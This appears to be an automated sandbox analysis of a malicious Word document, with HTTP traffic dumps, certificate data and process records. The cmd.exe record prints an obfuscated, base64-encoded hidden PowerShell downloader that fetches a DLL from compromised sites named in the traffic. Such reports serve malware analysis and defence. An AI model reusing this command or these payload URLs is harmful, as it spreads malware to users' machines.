                                                                                                                        Mar 16, 2021 14:27:10.732588053 CET800INData Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 6c 65 66 74 3b 20 77 69 64 74 68 3a 32 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32
                                                                                                                        Data Ascii: <div style="float:left; width:200px; text-align: center; padding-right: 20px;"> <span class="error_code">403</span> <span class="error_description">Forbidden</span> </div> <div s


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.549724151.106.5.16980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Mar 16, 2021 14:27:14.990628958 CET1391OUTGET /847346324234234/rpnvXm/ HTTP/1.1
                                                                                                                        Host: tongdaihanoi.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Mar 16, 2021 14:27:15.043883085 CET1392INHTTP/1.1 200 OK
                                                                                                                        cache-control: max-age=0, private, must-revalidate
                                                                                                                        connection: close
                                                                                                                        content-length: 495
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        date: Tue, 16 Mar 2021 13:27:14 GMT
                                                                                                                        server: nginx
                                                                                                                        set-cookie: sid=529043ec-865b-11eb-ad9b-19c8d4ec230d; path=/; domain=.tongdaihanoi.com; expires=Sun, 03 Apr 2089 16:41:22 GMT; max-age=2147483647; HttpOnly
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 74 6f 6e 67 64 61 69 68 61 6e 6f 69 2e 63 6f 6d 2f 38 34 37 33 34 36 33 32 34 32 33 34 32 33 34 2f 72 70 6e 76 58 6d 2f 3f 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4e 54 6b 77 4f 44 51 7a 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 31 4f 54 41 78 4d 6a 4d 31 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 47 31 6b 59 6a 63 31 4d 6a 5a 6e 5a 6d 68 72 61 6d 64 31 63 54 41 77 4d 6a 46 72 5a 57 67 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 55 35 4d 44 45 79 4d 7a 55 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 31 4f 54 41 78 4d 6a 4d 31 4d 44 4d 79 4d 44 55 30 66 51 2e 4c 48 64 7a 58 67 35 6a 37 61 32 2d 4a 53 5f 68 73 73 53 78 4f 43 79 74 36 45 56 52 70 43 75 32 64 4e 33 78 61 4c 58 51 50 4f 34 26 73 69 64 3d 35 32 39 30 34 33 65 63 2d 38 36 35 62 2d 31 31 65 62 2d 61 64 39 62 2d 31 39 63 38 64 34 65 63 32 33 30 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                        Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxNTkwODQzNSwiaWF0IjoxNjE1OTAxMjM1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycG1kYjc1MjZnZmhramd1cTAwMjFrZWgiLCJuYmYiOjE2MTU5MDEyMzUsInRzIjoxNjE1OTAxMjM1MDMyMDU0fQ.LHdzXg5j7a2-JS_hssSxOCyt6EVRpCu2dN3xaLXQPO4&sid=529043ec-865b-11eb-ad9b-19c8d4ec230d');</script></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.54972535.209.212.4880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Mar 16, 2021 14:27:15.489614010 CET1393OUTGET /wp-includes/ciAjcgj/ HTTP/1.1
                                                                                                                        Host: opheliasbrewery.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Mar 16, 2021 14:27:15.649028063 CET1395INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 16 Mar 2021 13:27:15 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        X-Httpd: 1
                                                                                                                        Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                        X-Proxy-Cache: HIT
                                                                                                                        Data Raw: 31 34 36 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 77 68 69 74 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 7d 0a 20 20 20 20 2e 74 69 74 6c 65 20 7b 20 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 61 75 74 6f 20 31 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 74 69 74 6c 65 2d 2d 72
                                                                                                                        Data Ascii: 146e6<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: relative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; } .title--r
                                                                                                                        Mar 16, 2021 14:27:15.649059057 CET1396INData Raw: 65 67 75 6c 61 72 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 20 20 20 20 2e 74 69 74 6c 65 2d 2d 73 69 7a 65 2d 6c 61 72 67 65 20 7b 20 66 6f 6e 74
                                                                                                                        Data Ascii: egular { font-family: 'Roboto', Arial, sans-serif; } .title--size-large { font-size: 36px; line-height: 46px; } .title--size-semimedium { font-size: 20px; line-height: 28px; } .title--weight-normal { font-weight: 400; } .title-
                                                                                                                        Mar 16, 2021 14:27:15.649075031 CET1397INData Raw: 6f 76 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 69 64 3d 22 61 63 63 65 37 36 37 30 2d 39 30 34 66 2d 34 66 38 63 2d 62 38 36 37 2d 36 38 31 33 38 63 32 66 38 63 30 36 22 20 64 61 74 61 2d 6e 61 6d
                                                                                                                        Data Ascii: over"> <svg id="acce7670-904f-4f8c-b867-68138c2f8c06" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1019 467"><title>404_bg</title><path d="M962.794,62.029a11.471,11.471,0,0,1-.656-22.923h0a11.471,11.4
                                                                                                                        Mar 16, 2021 14:27:15.649091005 CET1399INData Raw: 2e 38 35 31 6c 32 34 2e 33 35 36 2c 31 33 2e 36 30 37 61 31 2c 31 2c 30 2c 30 2c 31 2d 2e 30 33 38 2c 31 2e 37 36 37 6c 2d 32 34 2e 39 32 36 2c 31 32 2e 35 33 32 41 31 2e 30 30 36 2c 31 2e 30 30 36 2c 30 2c 30 2c 31 2c 37 37 33 2e 33 31 36 2c 32
                                                                                                                        Data Ascii: .851l24.356,13.607a1,1,0,0,1-.038,1.767l-24.926,12.532A1.006,1.006,0,0,1,773.316,228.33Zm1.535-25.456-.5,22.815,21.756-10.938Z" fill="#226d7a"/><path d="M136.509,150.348l-2.39-8.09a7.115,7.115,0,1,0-1.9.629l2.372,8.028a1,1,0,0,0,.959.717,1,1,0
                                                                                                                        Mar 16, 2021 14:27:15.649156094 CET1400INData Raw: 34 31 33 41 37 2c 37 2c 30 2c 31 2c 30 2c 31 31 2c 32 36 35 63 2e 30 38 2c 30 2c 2e 31 35 38 2d 2e 30 30 39 2e 32 33 37 2d 2e 30 31 32 6c 32 2e 32 31 39 2c 37 2e 39 35 61 31 2c 31 2c 30 2c 30 2c 30 2c 31 2e 39 32 37 2d 2e 35 33 38 5a 4d 36 2c 32
                                                                                                                        Data Ascii: 413A7,7,0,1,0,11,265c.08,0,.158-.009.237-.012l2.219,7.95a1,1,0,0,0,1.927-.538ZM6,258a5,5,0,1,1,5,5A5.006,5.006,0,0,1,6,258Z" fill="#226d7a"/><path d="M39.924,315.537l-7.936-2.293c0-.082.012-.162.012-.244a7.008,7.008,0,0,0-7-7c-.08,0-.158.009-.
                                                                                                                        Mar 16, 2021 14:27:15.649173021 CET1401INData Raw: 39 2c 31 2c 31 2c 30 2c 30 2c 30 2c 2e 32 37 36 2d 31 2e 39 36 31 6c 2d 37 2e 39 32 34 2d 32 2e 32 39 61 37 2c 37 2c 30 2c 31 2c 30 2d 31 31 2e 39 31 38 2c 32 2e 39 36 35 6c 2d 36 2e 30 30 36 2c 35 2e 38 32 34 61 31 2c 31 2c 30 2c 31 2c 30 2c 31
                                                                                                                        Data Ascii: 9,1,1,0,0,0,.276-1.961l-7.924-2.29a7,7,0,1,0-11.918,2.965l-6.006,5.824a1,1,0,1,0,1.392,1.436L48.408,223A6.952,6.952,0,0,0,52,224Zm0-12a5,5,0,1,1-5,5A5.006,5.006,0,0,1,52,212Z" fill="#226d7a"/><path d="M122,281a6.984,6.984,0,0,0-1.218.113l-2.36
                                                                                                                        Mar 16, 2021 14:27:15.649194002 CET1403INData Raw: 37 2e 32 37 38 2d 35 2e 32 39 34 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 31 37 36 2c 31 2e 36 31 38 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 39 35 2e 37 2c 31 39 38 2e 33 36 36 61 31 2c 31 2c 30 2c
                                                                                                                        Data Ascii: 7.278-5.294a1,1,0,0,0-1.176,1.618Z" fill="#226d7a"/><path d="M995.7,198.366a1,1,0,0,0-1.176,1.617l7.28,5.293a.986.986,0,0,0,.587.192,1,1,0,0,0,.588-1.809Z" fill="#226d7a"/><path d="M1002.5,232.72a1,1,0,0,0-1.366.365l-4.5,7.793a1,1,0,1,0,1.732,
                                                                                                                        Mar 16, 2021 14:27:15.649211884 CET1404INData Raw: 2e 32 37 31 2d 2e 30 31 34 6c 32 2e 35 37 36 2c 37 2e 38 37 39 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 39 35 2e 36 39 2e 39 38 35 2e 39 38 35 2c 30 2c 30 2c 30 2c 2e 33 31 2d 2e 30 35 2c 31 2c 31 2c 30 2c 30 2c 30 2c 2e 36 34 2d 31 2e 32 36 31 6c 2d
                                                                                                                        Data Ascii: .271-.014l2.576,7.879a1,1,0,0,0,.95.69.985.985,0,0,0,.31-.05,1,1,0,0,0,.64-1.261l-2.492-7.624A7.007,7.007,0,0,0,879,113Zm-7,5a5,5,0,1,1,5-5A5.006,5.006,0,0,1,872,118Z" fill="#226d7a"/><path d="M1012,205a7,7,0,0,0-2.469,13.542l-3.9,6.75a1,1,0,1
                                                                                                                        Mar 16, 2021 14:27:15.649286985 CET1405INData Raw: 2e 36 32 31 20 31 34 33 2e 39 30 34 20 31 33 31 2e 37 33 34 20 31 34 35 2e 37 34 32 20 31 33 33 2e 38 34 38 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 34 35 2e 37 34 32 20 31 32 32 2e 30 34
                                                                                                                        Data Ascii: .621 143.904 131.734 145.742 133.848" fill="#fff"/><polygon points="145.742 122.041 147.581 119.928 145.742 117.814 143.904 119.928 145.742 122.041" fill="#fff"/><polygon points="145.742 110.235 147.581 108.122 145.742 106.008 143.904 108.122
                                                                                                                        Mar 16, 2021 14:27:15.649306059 CET1407INData Raw: 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 36 36 2e 32 38 38 20 39 34 2e 32 30 32 20 31 36 34 2e 34 35 20 39 36 2e 33 31 36 20 31 36 36 2e 32 38 38 20 39 38 2e 34 32 39 20 31 36 38 2e 31 33
                                                                                                                        Data Ascii: " fill="#fff"/><polygon points="166.288 94.202 164.45 96.316 166.288 98.429 168.13 96.316 166.288 94.202" fill="#fff"/><polygon points="168.128 84.51 166.288 82.396 164.45 84.51 166.288 86.624 168.128 84.51" fill="#fff"/><polygon points="176.5
                                                                                                                        Mar 16, 2021 14:27:15.803983927 CET1408INData Raw: 20 31 39 35 2e 32 36 38 20 31 33 31 2e 37 33 34 20 31 39 37 2e 31 31 20 31 33 33 2e 38 34 38 20 31 39 38 2e 39 34 38 20 31 33 31 2e 37 33 34 20 31 39 37 2e 31 31 20 31 32 39 2e 36 32 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79
                                                                                                                        Data Ascii: 195.268 131.734 197.11 133.848 198.948 131.734 197.11 129.621" fill="#fff"/><polygon points="197.11 117.814 195.268 119.928 197.11 122.041 198.948 119.928 197.11 117.814" fill="#fff"/><polygon points="197.11 106.008 195.268 108.122 197.11 110


                                                                                                                        HTTPS Packets

                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                        Mar 16, 2021 14:27:13.133013010 CET107.180.2.185443192.168.2.549722CN=calltorepair.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USMon Dec 07 15:06:34 CET 2020 Tue May 03 09:00:00 CEST 2011Wed Aug 25 01:02:57 CEST 2021 Sat May 03 09:00:00 CEST 2031771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                        CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                        Mar 16, 2021 14:27:13.926667929 CET107.180.2.185443192.168.2.549723CN=calltorepair.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USMon Dec 07 15:06:34 CET 2020 Tue May 03 09:00:00 CEST 2011Wed Aug 25 01:02:57 CEST 2021 Sat May 03 09:00:00 CEST 2031771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                        CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031

                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        Analysis Process: WINWORD.EXE PID: 4928 Parent PID: 792

                                                                                                                        General

                                                                                                                        Start time:14:26:51
                                                                                                                        Start date:16/03/2021
                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                        Imagebase:0x9e0000
                                                                                                                        File size:1937688 bytes
                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: cmd.exe PID: 6276 Parent PID: 4832

                                                                                                                        General

                                                                                                                        Start time:14:26:58
                                                                                                                        Start date:16/03/2021
                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApAC